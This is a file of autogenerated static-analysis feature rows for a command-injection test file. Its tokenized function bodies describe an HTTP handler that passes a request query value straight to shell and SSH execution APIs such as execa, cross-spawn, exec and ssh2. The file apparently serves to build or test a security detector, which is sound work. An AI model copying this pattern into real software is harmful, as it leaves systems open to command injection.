autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:18:21:32 | require("ssh2") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:18:21:32 | require("ssh2") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:18:21:32 | require("ssh2") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:18:21:32 | require("ssh2") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:18:21:32 | require("ssh2") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:26:21:31 | "ssh2" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:26:21:31 | "ssh2" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:26:21:31 | "ssh2" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:26:21:31 | "ssh2" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:26:21:31 | "ssh2" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:26:21:31 | "ssh2" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:26:21:31 | "ssh2" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:26:21:31 | "ssh2" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:14 | exceptional return of new ssh2() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:14 | exceptional return of new ssh2() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:14 | exceptional return of new ssh2() | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:14 | exceptional return of new ssh2() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:14 | exceptional return of new ssh2() | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:14 | new ssh2() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:14 | new ssh2() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:14 | new ssh2() | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:14 | new ssh2() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:14 | new ssh2() | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:19 | new ssh2().exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:19 | new ssh2().exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:19 | new ssh2().exec | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:19 | new ssh2().exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:19 | new ssh2().exec | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:24 | exceptional return of new ssh2().exec(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:24 | exceptional return of new ssh2().exec(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:24 | exceptional return of new ssh2().exec(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:24 | exceptional return of new ssh2().exec(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:24 | exceptional return of new ssh2().exec(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:24 | new ssh2().exec(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:24 | new ssh2().exec(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:24 | new ssh2().exec(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:24 | new ssh2().exec(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:24 | new ssh2().exec(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:9:22:12 | ssh2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:9:22:12 | ssh2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:9:22:12 | ssh2 | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:9:22:12 | ssh2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:9:22:12 | ssh2 | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:16:22:19 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:16:22:19 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:16:22:19 | exec | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:16:22:19 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:16:22:19 | exec | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:21:22:23 | cmd | CalleeFlexibleAccessPath | ssh2().exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:21:22:23 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:21:22:23 | cmd | calleeImports | ssh2 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:21:22:23 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:21:22:23 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:21:22:23 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:21:22:23 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:21:22:23 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:21 | exceptional return of new ssh2.Client() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:21 | exceptional return of new ssh2.Client() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:21 | exceptional return of new ssh2.Client() | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:21 | exceptional return of new ssh2.Client() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:21 | exceptional return of new ssh2.Client() | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:21 | new ssh2.Client() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:21 | new ssh2.Client() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:21 | new ssh2.Client() | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:21 | new ssh2.Client() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:21 | new ssh2.Client() | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:26 | new ssh ... ().exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:26 | new ssh ... ().exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:26 | new ssh ... ().exec | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:26 | new ssh ... ().exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:26 | new ssh ... ().exec | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:31 | exceptional return of new ssh ... ec(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:31 | exceptional return of new ssh ... ec(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:31 | exceptional return of new ssh ... ec(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:31 | exceptional return of new ssh ... ec(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:31 | exceptional return of new ssh ... ec(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:31 | new ssh ... ec(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:31 | new ssh ... ec(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:31 | new ssh ... ec(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:31 | new ssh ... ec(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:31 | new ssh ... ec(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:9:23:12 | ssh2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:9:23:12 | ssh2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:9:23:12 | ssh2 | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:9:23:12 | ssh2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:9:23:12 | ssh2 | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:9:23:19 | ssh2.Client | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:9:23:19 | ssh2.Client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:9:23:19 | ssh2.Client | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:9:23:19 | ssh2.Client | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:9:23:19 | ssh2.Client | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:14:23:19 | Client | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:14:23:19 | Client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:14:23:19 | Client | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:14:23:19 | Client | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:14:23:19 | Client | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:23:23:26 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:23:23:26 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:23:23:26 | exec | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:23:23:26 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:23:23:26 | exec | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:28:23:30 | cmd | CalleeFlexibleAccessPath | ssh2.Client().exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:28:23:30 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:28:23:30 | cmd | calleeImports | ssh2 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:28:23:30 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:28:23:30 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:28:23:30 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:28:23:30 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:28:23:30 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:11:25:20 | SSH2Stream | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:11:25:20 | SSH2Stream | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:11:25:20 | SSH2Stream | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:11:25:20 | SSH2Stream | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:11:25:20 | SSH2Stream | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:11:25:57 | SSH2Str ... 2Stream | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:11:25:57 | SSH2Str ... 2Stream | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:11:25:57 | SSH2Str ... 2Stream | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:11:25:57 | SSH2Str ... 2Stream | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:11:25:57 | SSH2Str ... 2Stream | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:11:25:57 | SSH2Stream | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:11:25:57 | SSH2Stream | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:11:25:57 | SSH2Stream | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require 